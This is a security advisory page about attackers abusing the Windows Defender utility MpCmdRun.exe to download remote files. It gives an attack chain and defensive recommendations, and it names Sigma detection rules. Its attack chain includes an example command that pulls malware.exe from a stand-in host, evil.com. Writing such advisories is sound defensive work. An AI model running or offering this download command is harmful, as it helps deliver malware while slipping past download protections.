Skip to content
Threat Feed
medium advisory

MpCmdRun Used for Remote File Download

Attackers are abusing the Windows Defender command-line utility, MpCmdRun.exe, to download malicious files from remote URLs, enabling them to introduce malware or offensive tooling into compromised environments.

Attackers are increasingly leveraging legitimate, signed utilities for malicious purposes, a tactic known as "living off the land." In this instance, adversaries are abusing the Windows Defender command-line utility, MpCmdRun.exe, to download files from remote URLs. This tool, normally used for managing Windows Defender Antivirus, can be misused with the -DownloadFile, -url, and -path parameters to retrieve and save arbitrary files. This technique allows attackers to bypass traditional download protections and introduce malware or offensive tooling into a compromised system. This activity has been observed since at least September 2020. Defenders need to be aware of the abuse potential of built-in tools like MpCmdRun.exe to identify and prevent such attacks.

Attack Chain

  1. The attacker gains initial access to a Windows system (e.g., via phishing or exploiting a vulnerability).
  2. The attacker uses MpCmdRun.exe to download a malicious payload from a remote server using the -DownloadFile, -url, and -path arguments. For example: MpCmdRun.exe -DownloadFile -url http://evil.com/malware.exe -path C:\Temp\malware.exe.
  3. MpCmdRun.exe connects to the remote server hosting the malicious file via HTTP or HTTPS.
  4. The remote server responds with the malicious payload, which is downloaded and saved to the specified path.
  5. The attacker executes the downloaded payload (e.g., malware, offensive tooling) using another command execution technique, such as PowerShell or cmd.exe.
  6. The executed payload establishes persistence, such as creating a scheduled task or modifying registry run keys.
  7. The attacker performs lateral movement within the network, leveraging the compromised host.
  8. The attacker achieves their objective, such as data exfiltration or ransomware deployment.

Impact

Successful exploitation enables attackers to introduce malware or offensive tools into the target environment, bypassing traditional security measures due to the use of a signed Microsoft binary. This can lead to data theft, system compromise, or ransomware deployment. While specific victim numbers and sectors are not available, the widespread use of Windows Defender makes this a potentially broad threat.

Recommendation

  • Deploy the Sigma rule provided to detect MpCmdRun.exe being used to download remote files, and tune for your environment.
  • Enable Sysmon process creation logging to capture command-line arguments of processes, which is required for the provided Sigma rule.
  • Investigate any instances of MpCmdRun.exe executing with the -DownloadFile, -url, and -path arguments in your environment (reference the Sigma rule).
  • Monitor network connections initiated by MpCmdRun.exe to identify potentially malicious downloads (reference network connection logs).

Detection coverage 2

Detect Remote File Download via MpCmdRun

medium

Detects MpCmdRun.exe being used to download a remote file using the -DownloadFile, -url, and -path parameters.

sigma tactics: command_and_control techniques: T1105 sources: process_creation, windows

Detect Remote File Download via MpCmdRun - Alternate Original Filename

medium

Detects MpCmdRun.exe being used to download a remote file by checking process.pe.original_file_name

sigma tactics: command_and_control techniques: T1105 sources: process_creation, windows

Detection queries are available on the platform. Get full rules →